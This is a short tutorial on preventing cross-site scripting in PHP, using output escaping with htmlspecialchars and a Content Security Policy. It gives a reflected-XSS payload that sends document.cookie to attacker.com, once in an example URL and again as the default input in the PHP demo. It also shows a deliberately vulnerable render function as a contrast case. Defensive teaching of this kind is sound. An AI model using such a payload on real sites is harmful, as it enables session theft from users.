Cross-Site Scripting (XSS) Prevention
Escape output with htmlspecialchars and implement a Content Security Policy.
What is XSS?
Cross-Site Scripting (XSS) occurs when an attacker injects malicious JavaScript into web pages viewed by other users. The script runs in the victim's browser with access to their session, cookies, and DOM.
Reflected XSS
The malicious payload arrives in a URL or form parameter and is reflected by the server, unescaped, into the HTML of the response, where the victim's browser executes it.
// Malicious URL:
https://example.com/search?q=<script>document.location="https://attacker.com/steal?c="+document.cookie</script>
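The two defences named at the top of this lesson, applied to the reflected search parameter above, as an added example that is not code from the original lesson. It assumes a PHP search endpoint that reflects `q`; the function names `render_search_vulnerable`, `render_search_safe`, `e` and `send_csp_header` are illustrative.

```php
<?php
declare(strict_types=1);

// Vulnerable (the behaviour the lesson's URL exploits): the raw parameter is
// concatenated into the document, so a <script> payload becomes live script.
function render_search_vulnerable(string $q): string
{
    return "<p>Results for: " . $q . "</p>";
}

// Output encoding for the HTML context. ENT_QUOTES encodes both quote styles
// (required when the value lands inside an attribute), ENT_HTML5 with an
// explicit charset avoids double-encoding surprises, and ENT_SUBSTITUTE
// replaces invalid UTF-8 instead of returning an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened: every untrusted value passes through e() at the point of output.
function render_search_safe(string $q): string
{
    return "<p>Results for: " . e($q) . "</p>";
}

// Defence in depth: a CSP that allows scripts only from this origin and no
// inline script, so a payload that slips past encoding is refused by the
// browser. Headers must be sent before any output.
function send_csp_header(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'");
}

// Constructed input mirroring the lesson's payload when no ?q= is supplied.
$q = $_GET['q'] ?? '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>';

send_csp_header();
header('Content-Type: text/html; charset=UTF-8');
echo render_search_safe($q);
// The response now contains &lt;script&gt;... as inert text, and even if it
// did not, the CSP blocks the inline script from running.
```

Check the hardened output in a browser's DOM inspector: the payload should appear as a text node inside the paragraph, never as a script element.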